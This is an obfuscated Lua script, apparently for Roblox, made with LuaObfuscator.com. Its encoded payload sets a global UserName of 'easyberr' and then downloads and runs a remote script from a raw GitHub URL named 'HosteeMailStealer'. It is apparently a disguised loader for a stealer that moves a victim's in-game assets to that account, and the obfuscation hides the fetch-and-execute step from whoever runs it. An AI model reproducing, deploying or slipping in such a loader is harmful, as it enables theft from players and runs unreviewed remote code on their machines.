--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v71=0;while true do if (v71==0) then v19=v0(v3(v30,1,1));return "";end end else local v72=v2(v0(v30,16));if v19 then local v79=0;local v80;while true do if (v79==1) then return v80;end if (v79==0) then v80=v5(v72,v19);v19=nil;v79=1;end end else return v72;end end end);local function v20(v31,v32,v33)if v33 then local v73=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-((2094 -1216) -(282 + 595))) -(v32-(1 -0))) + (2 -1))) ;return v73-(v73%1) ;else local v74=619 -(555 + 64) ;local v75;while true do if (v74==(931 -(857 + (136 -62)))) then v75=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v75 + v75))>=v75) and (118 -(8 + 24 + (1042 -(892 + 65))))) or (0 + 0) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(351 -(87 + (645 -382)))) then return v35;end if (v34==(180 -(67 + 113))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 + 0 ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==((1000 -(915 + 82)) -2)) then return (v38 * (1208 -(802 + 150))) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 + 0 ;v36=1;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (8 -5) );v18=v18 + (6 -3) + 1 ;return (v42 * (22064430 -5287214)) + (v41 * ((145954 -79231) -(1069 + 118))) + (v40 * 256) + v39 ;end local function v24()local v43=0 + 0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==((1083 -(1020 + 60)) -1)) then v48=v20(v45,21 + 0 ,(2245 -(630 + 793)) -(368 + 423) );v49=((v20(v45,100 -68 )==1) and  -1) or (19 -(10 + (27 -19))) ;v43=(1758 -(760 + 987)) -(1921 -(1789 + 124)) ;end if (v43==(442 -(416 + 26))) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==((767 -(745 + 21)) + 0)) then v46=1 -0 ;v47=(v20(v45,439 -(145 + 293) ,450 -(44 + 386) ) * ((1488 -(998 + 488))^(11 + (71 -50)))) + v44 ;v43=1 + 1 + 0 ;end if (v43==3) then if (v48==(772 -(201 + (1571 -1000)))) then if (v47==(1138 -(116 + 1022))) then return v49 * ((0 -0) -0) ;else local v97=0 + (0 -0) ;while true do if (v97==(0 -0)) then v48=3 -2 ;v46=859 -(7 + 807 + 45) ;break;end end end elseif (v48==(5043 -2996)) then return ((v47==(0 + 0)) and (v49 * ((1 + 0)/(0 + (1055 -(87 + 968)))))) or (v49 * NaN) ;end return v8(v49,v48-(1908 -(261 + 624)) ) * (v46 + (v47/(2^(92 -40)))) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v67=2 -1 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v69=0 + 0 ;local v70;while true do if (v69==0) then v70=0 + 0 ;while true do if (v70==1) then if ((3 -1)~=v53) then else local v105=0;while true do if (v105==(1274 -(388 + 886))) then for v108=1 -0 ,v23() do local v109=0;local v110;local v111;while true do if (v109~=1) then else while true do if (v110~=(0 + 0)) then else v111=v21();if (v20(v111,1,561 -(306 + 254) )==(0 + 0)) then local v179=0;local v180;local v181;local v182;local v183;while true do if (v179~=0) then else v180=0;v181=nil;v179=1 -0 ;end if (v179~=1) then else v182=nil;v183=nil;v179=1469 -(899 + 568) ;end if (v179==(2 + 0)) then while true do if (v180~=(2 -1)) then else local v190=0;while true do if ((604 -(268 + 335))~=v190) then else v180=2;break;end if (v190==0) then v183={v22(),v22(),nil,nil};if (v181==0) then local v198=290 -(60 + 230) ;local v199;local v200;local v201;while true do if (v198~=0) then else v199=0;v200=nil;v198=1;end if (v198==1) then v201=nil;while true do if (v199==(573 -(426 + 146))) then while true do if (v200==0) then v201=0;while true do if (v201~=(0 + 0)) then else v183[1459 -(282 + 1174) ]=v22();v183[4]=v22();break;end end break;end end break;end if (v199==0) then local v209=811 -(569 + 242) ;while true do if (v209==(2 -1)) then v199=1 + 0 ;break;end if (v209==(1024 -(706 + 318))) then v200=1251 -(721 + 530) ;v201=nil;v209=1;end end end end break;end end elseif (v181==(1272 -(945 + 326))) then v183[7 -4 ]=v23();elseif (v181==(2 + 0)) then v183[3]=v23() -((702 -(271 + 429))^(15 + 1)) ;elseif (v181~=(1503 -(1408 + 92))) then else local v210=1086 -(461 + 625) ;local v211;local v212;while true do if (v210~=(1289 -(993 + 295))) then else while true do if (v211==(0 + 0)) then v212=0;while true do if (v212==(1171 -(418 + 753))) then v183[2 + 1 ]=v23() -((1 + 1)^(5 + 11)) ;v183[4]=v22();break;end end break;end end break;end if (v210==(0 + 0)) then v211=0;v212=nil;v210=1;end end end v190=1;end end end if ((531 -(406 + 123))~=v180) then else local v191=0;while true do if (v191~=0) then else local v197=1769 -(1749 + 20) ;while true do if ((0 + 0)==v197) then if (v20(v182,1323 -(1249 + 73) ,1)~=1) then else v183[2]=v59[v183[1 + 1 ]];end if (v20(v182,1147 -(466 + 679) ,4 -2 )==(2 -1)) then v183[3]=v59[v183[1903 -(106 + 1794) ]];end v197=1 + 0 ;end if (v197~=(1 + 0)) then else v191=1;break;end end end if (v191==(2 -1)) then v180=3;break;end end end if ((7 -4)==v180) then if (v20(v182,117 -(4 + 110) ,587 -(57 + 527) )==1) then v183[4]=v59[v183[4]];end v54[v108]=v183;break;end if (v180~=0) then else local v193=1427 -(41 + 1386) ;local v194;while true do if (v193~=0) then else v194=103 -(17 + 86) ;while true do if (v194~=(1 + 0)) then else v180=1;break;end if (v194~=(0 -0)) then else local v202=0;while true do if (v202==(0 -0)) then v181=v20(v111,2,169 -(122 + 44) );v182=v20(v111,6 -2 ,19 -13 );v202=1;end if (v202~=1) then else v194=1;break;end end end end break;end end end end break;end end end break;end end break;end if (v109~=(0 + 0)) then else v110=0 + 0 ;v111=nil;v109=1 -0 ;end end end for v112=1,v23() do v55[v112-(66 -(30 + 35)) ]=v28();end v105=1 + 0 ;end if (v105==1) then return v57;end end end break;end if (v70~=(1257 -(1043 + 214))) then else local v98=0 -0 ;while true do if (v98~=(1213 -(323 + 889))) then else v70=2 -1 ;break;end if (v98==(580 -(361 + 219))) then if (v53~=(320 -(53 + 267))) then else local v106=0 + 0 ;while true do if (v106~=(414 -(15 + 398))) then else v56={};v57={v54,v55,nil,v56};v106=2;end if (v106~=(0 + 0)) then else v54={};v55={};v106=1;end if (v106==2) then v53=1;break;end end end if (v53==(851 -(20 + 830))) then local v107=0;while true do if (v107==1) then for v126=1 + 0 ,v58 do local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==2) then while true do if ((127 -(116 + 10))==v128) then v131=nil;while true do if (v129~=1) then else if (v130==(1 + 0)) then v131=v21()~=0 ;elseif (v130==(740 -(542 + 196))) then v131=v24();elseif (v130==3) then v131=v25();end v59[v126]=v131;break;end if (v129==0) then local v188=0;local v189;while true do if (v188==0) then v189=0;while true do if (v189~=0) then else v130=v21();v131=nil;v189=1 -0 ;end if (v189==1) then v129=1 + 0 ;break;end end break;end end end end break;end if ((0 + 0)==v128) then local v184=0;while true do if (v184==(1 + 0)) then v128=1;break;end if (v184==0) then v129=0;v130=nil;v184=1;end end end end break;end if (v127==0) then v128=0 -0 ;v129=nil;v127=1;end if (v127==1) then v130=nil;v131=nil;v127=4 -2 ;end end end v57[3]=v21();v107=1553 -(1126 + 425) ;end if ((407 -(118 + 287))~=v107) then else v53=7 -5 ;break;end if (v107==(1121 -(118 + 1003))) then v58=v23();v59={};v107=2 -1 ;end end end v98=1;end end end end break;end end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v81=v64;local v82=v65;local v83=v66;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==1) then if (v94<=5) then if (v94<=2) then if (v94<=0) then v91[v93[2]][v93[3]]=v93[4];elseif (v94==1) then v85=v93[3];elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=3) then v91[v93[2]]=v93[3];elseif (v94>4) then local v133=0;local v134;local v135;local v136;local v137;local v138;while true do if (v133==9) then v85=v93[3];break;end if (v133==5) then v85=v85 + 1 ;v93=v81[v85];v138=v93[2];v135,v136=v84(v91[v138](v13(v91,v138 + 1 ,v93[3])));v133=6;end if (v133==8) then v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v133=9;end if (v133==4) then v91[v138]=v137[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v133=5;end if (v133==2) then v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v62[v93[3]];v85=v85 + 1 ;v133=3;end if (v133==3) then v93=v81[v85];v138=v93[2];v137=v91[v93[3]];v91[v138 + 1 ]=v137;v133=4;end if (v133==6) then v86=(v136 + v138) -1 ;v134=0;for v174=v138,v86 do local v175=0;while true do if (0==v175) then v134=v134 + 1 ;v91[v174]=v135[v134];break;end end end v85=v85 + 1 ;v133=7;end if (v133==1) then v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v62[v93[3]];v133=2;end if (v133==0) then v134=nil;v135,v136=nil;v137=nil;v138=nil;v133=1;end if (v133==7) then v93=v81[v85];v138=v93[2];v91[v138]=v91[v138](v13(v91,v138 + 1 ,v86));v85=v85 + 1 ;v133=8;end end else do return;end end elseif (v94<=8) then if (v94<=6) then local v118=v93[2];local v119=v91[v93[3]];v91[v118 + 1 ]=v119;v91[v118]=v119[v93[4]];elseif (v94>7) then v91[v93[2]]();else local v139=0;local v140;local v141;local v142;local v143;while true do if (1==v139) then v86=(v142 + v140) -1 ;v143=0;v139=2;end if (0==v139) then v140=v93[2];v141,v142=v84(v91[v140](v13(v91,v140 + 1 ,v93[3])));v139=1;end if (v139==2) then for v176=v140,v86 do v143=v143 + 1 ;v91[v176]=v141[v143];end break;end end end elseif (v94<=9) then for v124=v93[2],v93[3] do v91[v124]=nil;end elseif (v94==10) then v91[v93[2]]=v62[v93[3]];else local v146=v93[2];v91[v146]=v91[v146](v13(v91,v146 + 1 ,v86));end v85=v85 + 1 ;break;end if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703083O00557365724E616D6503083O006561737962652O72030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O655363726970747A2F6D61696E2F486F73742O654D61696C537465616C657200153O0012033O00014O0009000100013O0026023O0002000100010004013O00020001001203000100013O00260200010005000100010004013O0005000100120A000200023O00300500020003000400122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O001400010004013O000500010004013O001400010004013O000200012O00043O00017O00",v9(),...);end
